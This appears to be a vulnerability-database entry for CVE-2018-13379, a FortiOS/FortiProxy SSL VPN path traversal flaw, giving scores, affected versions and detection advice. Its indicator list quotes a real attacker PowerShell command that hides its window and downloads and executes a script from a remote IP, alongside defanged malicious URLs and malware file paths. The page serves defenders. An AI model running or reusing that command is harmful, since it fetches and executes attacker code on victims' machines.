cbcvebase.
CVE-2018-13379
published 2019-06-04

CVE-2018-13379: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
100.00%
100.0th percentile
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.

Affected

8 ranges
VendorProductVersion rangeFixed in
fortinetfortinet
fortinetfortios
fortinetfortios>= 5.4.6 < 5.4.135.4.13
fortinetfortios>= 5.6.3 < 5.6.85.6.8
fortinetfortios>= 6.0.0 < 6.0.56.0.5
fortinetfortiproxy< 1.2.91.2.9
fortinetfortiproxy
fortinetfortiproxy

Detection & IOCsextracted from sources · hover to see the quote

urlhxxp://84.32.190[.]37:80/ahgffxvbghgfv
urlhxxp://185.150.117[.]186:80/asdfgsdhsdfgsdfg
urlhxxp://newspraize[.]com
urlhxxp://realmacnow[.]com
ip172.67.176[.]244
ip104.21.43[.]80
urlhxxp://67.205.182[.]129/u2/upload[.]php
path%public%\Music\svhost.exe
path%userprofile%\Music\t2747.exe
path%userprofile%\Pictures\socks.exe
path%systemroot%\System32\sok.exe
path%public%\Music\soks.exe
pathC:\PerfLogs\xxx.exe
command-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://84.32.190[.]37:80/ahgffxvbghgfv'))"
  • CVE-2018-13379 exploitation involves specially crafted HTTP resource requests to the FortiOS SSL VPN web portal to download system files without authentication — monitor for anomalous GET requests to SSL VPN portal paths containing path traversal sequences (e.g., '../') from unauthenticated sources.
  • APT29 exploited CVE-2018-13379 for FortiGate VPN initial access; hunt for unexpected VPN logins from new or dormant accounts following FortiGate access log anomalies.
  • CVE-2018-13379 is among the most repeatedly exploited CVEs by ransomware actors for initial access; prioritize detection of path traversal attempts against FortiOS SSL VPN web portal endpoints.
  • After CVE-2018-13379 exploitation, validate all SSL-VPN local users for expected accounts and correct email addresses; unrecognized local users may indicate post-exploitation persistence.
  • Play ransomware ransom notes contain email addresses in the format [seven random characters]@gmx[.]com — use this pattern to identify Play ransomware infections in email/file system forensics.
  • ·CVE-2018-13379 affects FortiOS 6.0.0–6.0.4, 5.6.3–5.6.7, and 5.4.6–5.4.12, and FortiProxy 2.0.0, 1.2.0–1.2.8, 1.1.0–1.1.6, and 1.0.0–1.0.7. Detection and mitigation efforts should confirm the exact affected version range before applying.
  • ·Fortinet patched CVE-2018-13379 in May 2019 (FG-IR-18-384); systems not upgraded to patched firmware remain vulnerable. Mitigations were provided for those unable to upgrade at the time of disclosure.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck9.1CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.